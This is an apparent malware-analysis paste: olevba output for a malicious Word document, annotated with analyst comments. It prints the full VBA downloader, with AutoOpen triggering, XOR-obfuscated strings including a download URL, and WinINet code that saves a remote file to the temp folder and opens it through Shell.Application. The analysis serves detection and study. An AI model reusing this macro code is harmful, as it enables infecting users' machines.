dynamoo

Malicious Word macro

Apr 15th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- inv_30~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: inv_30~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: inv_30~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub VICTOR(MARTIN As Long)
      ' Pass-through hop in the auto-exec chain: MARTIN is never read and the
      ' only effect is the call to JEREMY. The extra hop adds nothing
      ' functional; it just lengthens the path from autoopen to the payload logic.
  17. JEREMY
  18. End Sub
  19.  
  20. Sub autoopen()
      ' Auto-exec entry point: olevba reports AutoOpen as running when the Word
      ' document is opened. The literal 544 is discarded by VICTOR.
      ' Triage note: this is the root of the call chain, so analysis of the
      ' sample should start here.
  21. VICTOR 544
  22. End Sub
  23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  24. ANALYSIS:
  25. +----------+----------+---------------------------------------+
  26. | Type     | Keyword  | Description                           |
  27. +----------+----------+---------------------------------------+
  28. | AutoExec | AutoOpen | Runs when the Word document is opened |
  29. +----------+----------+---------------------------------------+
  30. -------------------------------------------------------------------------------
  31. VBA MACRO OIDL8.bas
  32. in file: inv_30~1.doc - OLE stream: u'Macros/VBA/OIDL8'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34.  
  35. Public Function JEFFERY() As Object
      ' Builds a COM object whose ProgID is hidden from static string scans.
      ' ALBERT XOR-decodes the hex constant EDWIN with the key EDDIE; applying
      ' that routine to the two constants shown in FILE6 gives
      ' "Scripting.FileSystemObject", which matches the GetSpecialFolder /
      ' FileExists / DeleteFile calls made on the result elsewhere in the macro.
      ' Returns: the newly created object (a fresh instance on every call).
  36. Dim LAWRENCE As String
  37. LAWRENCE = ALBERT(EDDIE, EDWIN)
  38. Set JEFFERY = CreateObject(LAWRENCE)
  39. End Function
  40.  
  41. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  42. ANALYSIS:
  43. +------------+--------------+--------------------------+
  44. | Type       | Keyword      | Description              |
  45. +------------+--------------+--------------------------+
  46. | Suspicious | CreateObject | May create an OLE object |
  47. +------------+--------------+--------------------------+
  48. -------------------------------------------------------------------------------
  49. VBA MACRO PIDLE0.bas
  50. in file: inv_30~1.doc - OLE stream: u'Macros/VBA/PIDLE0'
  51. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  52. Public Function JEFF(ByRef NICHOLAS As Object) As Object
      ' Returns NICHOLAS.GetSpecialFolder(2). On a Scripting.FileSystemObject,
      ' folder constant 2 is the temporary folder, so this is the drop
      ' directory for the file written later by DALE.
  53. Set JEFF = NICHOLAS.GetSpecialFolder(2)
  54. End Function
  55. Sub ROY(CALEIGH As Long)
      ' Another pass-through hop: CALEIGH is unused and the string "BRUCE" is
      ' ignored by BENJAMIN. The only effect is to reach VINCENT.
  56.  
  57. BENJAMIN ("BRUCE")
  58. End Sub
  59.  
  60.  
  61. Public Function BENJAMIN(VINCENTs As String)
      ' The parameter is named VINCENTs (with a trailing "s") and is never read;
      ' the body calls the separate function VINCENT, which holds the
      ' download-and-run logic. The function assigns no return value.
  62. VINCENT
  63. End Function
  64.  
  65.  
  66. Public Function ALBERT(BRANDON As String, ADAM As String) As String
      ' String de-obfuscator used for every hidden string in this sample.
      '   BRANDON - the XOR key text (callers pass the constant EDDIE).
      '   ADAM    - the ciphertext as a hex string, two hex digits per byte.
      ' Returns the decoded text: for each byte index BILLY from 1 to
      ' Len(ADAM) / 2, the hex pair (CHRIS) is XORed with one key character
      ' (EARL) and the resulting character (PHILIP) is appended.
      ' Analyst note: because key, ciphertext and algorithm are all in the
      ' document, the strings can be recovered offline by re-implementing this
      ' loop; there is no need to run the macro.
  67.    
  68.     Dim TONY As Integer
  69.     Dim LUIS As Integer
  70.    
  71.    
  72.     Dim WAYNE As Double
      ' Junk loop: WAYNE only takes the values 42 and 43, so the "= 32" test
      ' never fires and End is never reached. It is filler with no effect.
  73. For WAYNE = 42 To 43
  74. If WAYNE = 32 Then End
  75. Next WAYNE
  76.    
  77.     Dim BILLY As Long
  78.     Dim STEVE As String
      ' The loop bound is ANTONIO(ADAM) / 2, i.e. Len(ADAM) / 2, split across
      ' continuation lines.
  79.     For BILLY = 1 _
  80.     To _
  81.     ( _
  82.     ANTONIO _
  83.     (ADAM) _
  84.     / 2)
  85.         TONY = CHRIS(ADAM, BILLY)
  86.         LUIS = EARL(BRANDON, BILLY)
  87.         STEVE = STEVE + PHILIP(TONY, LUIS)
  88.     Next BILLY
  89.    ALBERT = STEVE
  90. End Function
  91.  
  92.  
  93. Sub JEREMY()
      ' Hop between VICTOR and ROY. AARON is declared but never used.
  94.         Dim AARON As Long
  95.  
  96.     Dim RANDY As Integer
      ' Junk loop: RANDY runs 414..416 and can never equal 1312, so End is
      ' never executed.
  97. For RANDY = 414 To 416
  98. If RANDY = 1312 Then End
  99. Next RANDY
  100.  
       ' The argument 5 is ignored by ROY.
  101. ROY (5)
  102.  
  103. End Sub
  104.  
  105.  
  106.  
  107.  
  108.  
  109. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  110. ANALYSIS:
  111. No suspicious keyword or IOC found.
  112. -------------------------------------------------------------------------------
  113. VBA MACRO IDL4.bas
  114. in file: inv_30~1.doc - OLE stream: u'Macros/VBA/IDL4'
  115. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  116.  
  117.  
  118.  
  119. Public Function EARL(ByRef BRANDON As String, ByRef BILLY As Long) As Integer
       ' Key-byte selector for ALBERT: returns the character code of the single
       ' character of BRANDON at 1-based position (BILLY Mod Len(BRANDON)) + 1.
       ' With BILLY starting at 1, the first key character used is the second
       ' character of the key, and the key repeats cyclically after that.
  120. EARL = Asc(JIMMY(BRANDON, _
  121.         ((BILLY Mod ANTONIO(BRANDON)) + 1), 1))
  122. End Function
  123. Public Function VINCENT()
       ' Main routine reached from autoopen (via VICTOR, JEREMY, ROY, BENJAMIN).
       ' Visible sequence: create a file-system object, resolve special folder 2,
       ' build a target path from a decoded name, delete any existing file at
       ' that path, call DALE to fetch and write the file, then ask a second COM
       ' object to open it. The function assigns no return value.
       ' Detection note: the observable behaviour is an Office process using
       ' wininet for an HTTP fetch, writing a file under the temp folder, and
       ' then opening that file through a shell COM object.
  124.  
  125. Dim MELVIN As Object
  126.  
  127.  
  128.     Dim JESUS As Integer
       ' Junk loop (repeated below with other constants): JESUS is modified
       ' inside the loop so it exits after one pass; its value is never used.
  129. For JESUS = 84 To 85
  130. JESUS = JESUS + 15
  131. Next JESUS
  132.    
  133.  
  134. Dim GLENN  As Object
  135.  
  136.  
  137. For JESUS = 70 To 71
  138. JESUS = JESUS + 5
  139. Next JESUS
  140.    
  141.  
       ' GLENN is the object from JEFFERY (ProgID decoded from EDWIN).
  142. Set GLENN _
  143. = JEFFERY()
  144.  
  145. For JESUS = 72 To 73
  146. JESUS = JESUS + 8
  147. Next JESUS
       ' JEFFERY is called a second time here, so a new object is created
       ' instead of reusing GLENN; MELVIN is its special folder 2.
  148. Set MELVIN = JEFF(JEFFERY)
  149.  
  150. Dim CHAD
  151. Dim JACOB
       ' JACOB is the decoded form of FREDERICK; the 1024 is ignored by EUGENE.
  152. JACOB = EUGENE(1024, EDDIE, FREDERICK)
  153.  
  154. For JESUS = 92 To 93
  155. JESUS = JESUS + 9
  156. Next JESUS
       ' CHAD is the drop path: folder object concatenated with the decoded name.
       ' NOTE(review): presumably relies on the folder object's default property
       ' yielding its path - confirm.
  157. CHAD = MELVIN & JACOB
  158.  
  159.  
       ' Remove a file left at the same path, e.g. by an earlier run.
  160. If FRANCIS(GLENN, CHAD) Then
  161. GLENN. _
  162. DeleteFile CHAD
  163. End If
       ' Empty If bodies: DALE is called only for its side effect (fetch and
       ' write to CHAD), and the second FRANCIS result is discarded, so the open
       ' below runs whether or not the download succeeded.
  164. If DALE(CHAD) Then
  165. End If
  166. If FRANCIS(GLENN, CHAD) Then
  167. End If
  168. Dim RALPH
       ' Second hidden ProgID: ALBERT applied to HERBERT with key EDDIE gives
       ' "Shell.Application". Calling Open on the dropped path is the step that
       ' hands the downloaded file to the shell.
  169. Set RALPH = CreateObject _
  170. (ALBERT _
  171. (EDDIE, HERBERT))
  172. RALPH.Open CHAD
  173. End Function
  174.  
  175.  
  176.  
  177.  
  178.  
  179.  
  180. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  181. ANALYSIS:
  182. +------------+--------------+--------------------------+
  183. | Type       | Keyword      | Description              |
  184. +------------+--------------+--------------------------+
  185. | Suspicious | CreateObject | May create an OLE object |
  186. | Suspicious | Open         | May open a file          |
  187. +------------+--------------+--------------------------+
  188. -------------------------------------------------------------------------------
  189. VBA MACRO FILE6.bas
  190. in file: inv_30~1.doc - OLE stream: u'Macros/VBA/FILE6'
  191. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  192.  
  193. Option Explicit
  194.  
  195.  
       ' Obfuscated string table. Each hex constant is XOR-decoded by ALBERT
       ' using EDDIE as the repeating key:
       '   HERBERT   - ProgID passed to CreateObject in VINCENT (the object whose
       '               Open method is called on the dropped file).
       '   FREDERICK - name appended to the special-folder path in VINCENT.
       '   JOEL      - second argument to InternetOpenUrlA in ANDREW, i.e. the
       '               download URL.
       '   EDWIN     - ProgID passed to CreateObject in JEFFERY.
       ' Analyst note: the decoded FREDERICK and JOEL values are this sample's
       ' file and network indicators; recover them offline from these constants.
  196. Public Const HERBERT = "122F222E3B77142635223E2A29352E282C"
  197. Public Const FREDERICK = "1D352E38383B6478756032312D"
  198. Public Const JOEL = "293333326D767A3721223E3D213124222C3623307826213A667B74746874626D7B333D2B"
  199. Public Const EDWIN = "1224352B272D3C38226011202424143E31233C38192724322A3C"
  200. Public Const EDDIE = "HAGGBWYUVENWI"
  201.  
       ' JAMES is not referenced by any code visible in this listing.
  202. Public Const JAMES = "JOHN"
  203.  
  204. #If VBA7 And Win64 Then
       ' WinINet imports hidden behind first-name aliases; this branch is the
       ' PtrSafe/LongPtr form for 64-bit Office, the #Else branch is the 32-bit
       ' form with Long handles.
       '   ROBERT  -> InternetCloseHandle
       '   MICHAEL -> InternetOpenA
       '   WILLIAM -> InternetReadFile
       '   DAVID   -> InternetOpenUrlA
       ' olevba lists wininet.dll as an IOC and "Lib" as suspicious for this
       ' module. The alias names carry no meaning; hunt on the Alias strings and
       ' the DLL name instead.
  205. Public _
  206. Declare _
  207. PtrSafe _
  208. Function _
  209. ROBERT Lib _
  210. "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long
  211. Public _
  212. Declare _
  213. PtrSafe _
  214. Function _
  215. MICHAEL Lib _
  216. "wininet.dll" Alias "InternetOpenA" (ByVal CHARLES As String, ByVal MARVINPH As Long, ByVal THOMAS As String, ByVal CHRISTOPHER As String, ByVal DANIEL As Long) As LongPtr
  217. Public _
  218. Declare _
  219. PtrSafe _
  220. Function _
  221. WILLIAM Lib _
  222. "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal MARK As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  223. Public _
  224. Declare _
  225. PtrSafe _
  226. Function _
  227. DAVID Lib _
  228. "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal STEVEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
  229. #Else
  230. Public Declare Function ROBERT Lib "wininet.dll" _
  231. Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long
  232. Public Declare Function MICHAEL Lib "wininet.dll" _
  233. Alias "InternetOpenA" (ByVal CHARLES As String, ByVal MARVINPH As Long, ByVal THOMAS As String, ByVal CHRISTOPHER As String, ByVal DANIEL As Long) As Long
  234. Public Declare Function WILLIAM Lib "wininet.dll" _
  235. Alias "InternetReadFile" (ByVal PAUL As Long, ByVal MARK As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  236. Public Declare Function DAVID Lib "wininet.dll" _
  237. Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal STEVEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
  238. #End If
  239.  
  240.  
  241.  
       ' Download parameters used by DALE, VINNIPUH and ANDREW:
       '   MANUEL - read-buffer size (fixed-length string size and the byte count
       '            passed to InternetReadFile).
       '   RODNEY - first argument to InternetOpenA, the agent string; "CURTIS"
       '            is therefore a candidate User-Agent value for network
       '            detection of this sample.
       '   NORMAN - second argument to InternetOpenA (access type); 1 is
       '            INTERNET_OPEN_TYPE_DIRECT.
       '   ALLEN  - fifth argument to InternetOpenUrlA (flags); &H4000000 is
       '            INTERNET_FLAG_DONT_CACHE.
  242. Private Const MANUEL = 8162
  243. Private Const RODNEY As String = "CURTIS"
  244. Private Const NORMAN = 1
  245. Private Const ALLEN = &H4000000
  246.  
  247. Public Function DALE _
  248. (ByVal MARVIN As String) As Boolean
       ' Downloader: fetches the URL decoded in ANDREW through WinINet and writes
       ' the response to the file path MARVIN.
       '   MARVIN  - destination path (VINCENT passes the special-folder path
       '             plus the decoded file name).
       '   Returns - True when NATHAN (length of the accumulated data) is
       '             non-zero; stays False if the session or URL handle is 0.
  249.     #If VBA7 _
  250.     And Win64 Then
  251.         Dim LEONARD As LongPtr, STANLEY As LongPtr
  252.     #Else
  253.         Dim LEONARD As Long, STANLEY As Long
  254.     #End If
  255.     Dim FRANK As Long
  256.     Dim MARK As String * MANUEL, CHARLES As String
  257.     Dim MIKE As Integer, NATHAN As Double
       ' LEONARD is the InternetOpenA session handle; give up if it failed.
  258.     LEONARD = VINNIPUH
  259.     If LEONARD = 0 Then
  260.         Exit Function
  261.     End If
       ' STEPHEN is declared but never used.
  262.     Dim STEPHEN As Boolean
  263.    
       ' ANDREW stores the InternetOpenUrlA handle into STANLEY (ByRef); its
       ' Boolean result is always True and is ignored here.
  264.     If ANDREW(STANLEY, LEONARD) Then
  265.     End If
  266.     If STANLEY = 0 Then
  267.         NATHAN = 0
  268.     Else
       ' First read: FRANK receives the byte count, but the whole fixed-length
       ' buffer MARK (MANUEL characters) is copied into CHARLES, not just the
       ' first FRANK characters.
  269.         WILLIAM STANLEY, MARK, MANUEL, FRANK
  270.         CHARLES = MARK
  271.           Dim RAYMOND As Long
       ' Junk loop: RAYMOND is 321..322 and never 1232, so End is not reached.
  272. For RAYMOND = 321 To 322
  273. If RAYMOND = 1232 Then End
  274. Next RAYMOND
       ' Remaining reads: append only the FRANK characters returned, until a
       ' read reports 0 bytes.
  275.         Do While FRANK <> 0
  276.             WILLIAM STANLEY, MARK, MANUEL, FRANK
  277.                     CHARLES = CHARLES + Mid(MARK, 1, FRANK)
  278.         Loop
       ' NATHAN = Len(CHARLES); MIKE = a free file number (DANNY ignores "JERRY").
  279.              NATHAN = ANTONIO(CHARLES): _
  280.              MIKE = DANNY("JERRY")
       ' Write the accumulated data to MARVIN in binary mode; olevba flags
       ' Open / Binary / Write / Put for this module.
  281.         Open MARVIN _
  282.             For Binary Access Write _
  283.         Lock Write _
  284.         As #MIKE
  285.         Put #MIKE, _
  286.                 , CHARLES
  287.         Dim DENNIS As Double
       ' Junk loop: DENNIS is 42..43 and never 437.
  288.             For DENNIS = 42 To 43
  289.     If DENNIS = 437 Then End
  290. Next DENNIS
  291.         Close #MIKE
  292.     End If
       ' Close the URL handle and then the session handle (InternetCloseHandle).
  293.     ROBERT STANLEY
  294.     ROBERT LEONARD
  295.     CHARLES = ""
  296.     If NATHAN Then
  297.         DALE = True
  298.     End If
  299. End Function
  300.  
  301. Public Function PHILIP(ByRef TONY As Integer, ByRef LUIS As Integer) As String
       ' XOR step of the decoder: returns the character whose code is
       ' TONY Xor LUIS (cipher byte XOR key byte, as called from ALBERT).
       ' olevba flags Chr and Xor here as possible string obfuscation.
  302.     PHILIP = Chr(TONY Xor LUIS)
  303. End Function
  304.  
  305. Public Function CHRIS(ByRef ADAM As String, ByRef BILLY As Long) As Integer
       ' Hex-pair reader for the decoder: takes the two characters of ADAM
       ' starting at position JOHNNY(BILLY) = 2 * BILLY - 1, prefixes "&H" and
       ' converts with Val, giving the BILLY-th cipher byte as an integer.
  306.  CHRIS = Val("&H" & (JIMMY(ADAM, JOHNNY(BILLY), 2)))
  307. End Function
  308. Public Function JOHNNY(ByRef BILLY As Long) As Long
       ' Maps a 1-based byte index to the 1-based position of its first hex
       ' digit: 1 -> 1, 2 -> 3, 3 -> 5, ...
  309.  JOHNNY = (2 * BILLY) - 1
  310. End Function
  311.  
  312.  
  313. Public Function JIMMY(ByRef BRYAN As String, ByRef TONY As Integer, ByRef LUIS As Integer) As String
       ' Thin wrapper around Mid$: returns LUIS characters of BRYAN starting at
       ' position TONY. Wrapping the built-in keeps Mid$ out of the decoder body.
  314.     JIMMY = Mid$(BRYAN, TONY, LUIS)
  315. End Function
  316.  
  317. Public Function ANTONIO(BRYAN As String) As Long
       ' Thin wrapper around Len: returns the length of BRYAN.
  318. ANTONIO = Len(BRYAN)
  319. End Function
  320. Public Function DANNY(BRYAN As String) As Integer
       ' Returns the next free file number (FreeFile); BRYAN is ignored.
  321.     DANNY = FreeFile
  322. End Function
  323.  
  324.  
  325.  
  326.  
  327. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  328. ANALYSIS:
  329. +------------+----------------+-----------------------------------------+
  330. | Type       | Keyword        | Description                             |
  331. +------------+----------------+-----------------------------------------+
  332. | Suspicious | Lib            | May run code from a DLL                 |
  333. | Suspicious | Open           | May open a file                         |
  334. | Suspicious | Write          | May write to a file (if combined with   |
  335. |            |                | Open)                                   |
  336. | Suspicious | Put            | May write to a file (if combined with   |
  337. |            |                | Open)                                   |
  338. | Suspicious | Chr            | May attempt to obfuscate specific       |
  339. |            |                | strings                                 |
  340. | Suspicious | Xor            | May attempt to obfuscate specific       |
  341. |            |                | strings                                 |
  342. | Suspicious | Binary         | May read or write a binary file (if     |
  343. |            |                | combined with Open)                     |
  344. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  345. |            |                | be used to obfuscate strings (option    |
  346. |            |                | --decode to see all)                    |
  347. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  348. |            |                | may be used to obfuscate strings        |
  349. |            |                | (option --decode to see all)            |
  350. | IOC        | wininet.dll    | Executable file name                    |
  351. +------------+----------------+-----------------------------------------+
  352. -------------------------------------------------------------------------------
  353. VBA MACRO IDL3.bas
  354. in file: inv_30~1.doc - OLE stream: u'Macros/VBA/IDL3'
  355. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  356.  
  357. Public Function FRANCIS(ByRef RYAN As Object, ByVal ROGER As String) As Boolean
       ' Returns True when RYAN.FileExists(ROGER) is true, otherwise False.
       ' VINCENT passes the object created by JEFFERY and the drop path.
  358. If RYAN.FileExists(ROGER) Then
  359. FRANCIS = True
  360. Else
  361. FRANCIS = False
  362. End If
  363. End Function
  364. #If VBA7 _
  365.     And Win64 Then
  366.        Public Function ANDREW(ByRef JOE As LongPtr, JUAN As LongPtr) As Boolean
  367.     #Else
  368.        Public Function ANDREW(ByRef JOE As Long, JUAN As Long) As Boolean
  369.     #End If
       ' Opens the download URL on an existing WinINet session.
       '   JOE     - out parameter (ByRef): receives the InternetOpenUrlA handle.
       '   JUAN    - session handle from InternetOpenA (see VINNIPUH).
       '   Returns - always True; the caller must check JOE for 0 to detect
       '             failure. HOWARD is declared but never used.
  370. Dim JACK As String
  371. Dim HOWARD As Long
       ' JACK is the URL: JOEL decoded with key EDDIE (the 325 is ignored by EUGENE).
  372.     JACK _
  373.     = EUGENE(325, EDDIE, JOEL)
  374.    
       ' DAVID = InternetOpenUrlA(session, url, no extra headers, 0, ALLEN flags, 0).
  375.                 JOE _
  376.     = DAVID _
  377.     ( _
  378.     JUAN, _
  379.     JACK, vbNullString, _
  380.     0, _
  381.     ALLEN, 0)
  382.     ANDREW = True
  383. End Function
  384.  
  385. #If VBA7 _
  386.     And Win64 Then
  387. Public Function VINNIPUH() As LongPtr
  388.  #Else
  389. Public Function VINNIPUH() As Long
  390.  
  391.  #End If
  392.  
       ' Opens the WinINet session: MICHAEL = InternetOpenA with agent string
       ' RODNEY ("CURTIS"), access type NORMAN (1), no proxy name or bypass list,
       ' and flags 0. Returns the session handle, which DALE treats as failed
       ' when it is 0.
  393.  VINNIPUH = MICHAEL(RODNEY, NORMAN, vbNullString, vbNullString, 0)
  394. End Function
  395.  
  396. Public Function EUGENE(BOBBY As Long, CARLOS As String, RUSSELL As String) As String
       ' Indirection over the decoder: returns ALBERT(CARLOS, RUSSELL), i.e.
       ' RUSSELL (hex ciphertext) decoded with key CARLOS. BOBBY is never read;
       ' the numbers callers pass (1024, 325) have no effect.
  397. EUGENE = ALBERT(CARLOS, RUSSELL)
  398.    
  399. End Function
  400.  
  401.  
  402.  
  403.  
  404.  
  405.  
  406. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  407. ANALYSIS:
  408. No suspicious keyword or IOC found.